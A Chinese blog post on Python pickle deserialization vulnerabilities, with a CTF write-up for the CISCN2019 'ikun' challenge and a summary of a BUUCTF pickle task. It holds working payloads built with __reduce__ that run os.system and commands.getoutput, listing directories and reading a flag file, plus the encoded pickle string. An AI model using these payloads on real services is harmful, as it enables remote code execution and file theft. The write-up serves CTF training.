python pickle反序列化漏洞_Python Pickle反序列化漏洞

命令执行#模仿Epicccal师傅的例子

import pickle

import os

class Test2(object):

def __reduce__(self):

#被调用函数的参数

cmd = "/usr/bin/id"

return (os.system,(cmd,))

if __name__ == "__main__":

test = Test2()

#执行序列化操作

result1 = pickle.dumps(test)

#执行反序列化操作

result2 = pickle.loads(result1)

# __reduce__()魔法方法的返回值:

# return(os.system,(cmd,))

# 1.满足返回一个元组,元组中有两个参数

# 2.第一个参数是被调用函数 : os.system()

# 3.第二个参数是一个元组:(cmd,),元组中被调用的参数 cmd

# 4. 因此序列化时被解析执行的代码是 os.system("/usr/bin/id")

题目训练

0x00:[CISCN2019 华北赛区 Day1 Web2]ikun

前面的步骤就不再详细描述了,这里直接从Pickle反序列化漏洞入手

在settings.py文件中发现提示,unicode解码一下

观察源码发现后门在Admin.py中

self.render('form.html', res=p, member=1)

这段代码的意思就是找到模板文件,进行渲染,从而显示页面

来观察一下form.html页面

说明传入的是可以直接进行回显的,而且可以将自定义的类进行序列化和反序列化,因此存在Pickle反序列化漏洞,那我们就可以构造一个通过pickle.dumps序列化的payload,从而被解析读取flag或其他信息。

构造payload可以使用方法__reduce__(self),先要获取的flag文件的位置,然后进行读取

但需要注意几点:

#os.system和os.popen

os.system 调用系统命令,完成后退出,返回结果是命令执行状态,一般是0

os.popen() 无法读取程序执行的返回值

这两个函数只有以print输出时才会回显,如果是以return返回的就不会显示结果。

查了资料发现

可以使用commands.getoutput()这个函数来进行代替,构造payload

# coding=utf8

import pickle

import urllib

import commands

class payload(object):

def __reduce__(self):

return (commands.getoutput,('ls /',))

a = payload()

print urllib.quote(pickle.dumps(a))

#ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.

发现flag.txt文件,那接下来就读取即可

return (commands.getoutput,('cat /flag.txt',))

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用了Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。然后可以将这个字符串反序列化为原来的对象。这个过程中,如果不对反序列化的输入进行充分验证和过滤,攻击者可以构造恶意的pickle字符串,从而在反序列化的过程中执行任意代码。 在BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串进行base64解码,并使用pickle模块的loads函数进行反序列化操作。这样就可以触发恶意代码的执行。 为了说明这个例子,作者提供了一个脚本来解析这个pickle字符串,首先使用base64解码得到原始字符串,然后使用pickle模块的loads函数进行反序列化操作,并最终执行恶意代码。这个例子展示了如何利用pickle模块的反序列化功能来执行任意代码。 在pickle模块中,还有一些其他的相关函数和方法可以帮助我们理解和分析pickle字符串的结构和内容。例如,pickletools模块提供了dis函数来反汇编pickle字符串,以及optimize函数来优化和简化pickle字符串的内容。 总结来说,BUUCTF中的Pickle反序列化漏洞是利用了pickle模块的反序列化功能来执行任意代码的漏洞。攻击者通过构造恶意的pickle字符串,可以在反序列化的过程中执行任意代码。为了解析和分析pickle字符串,可以使用pickle模块提供的函数和方法,如loads、pickletools.dis和pickletools.optimize。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值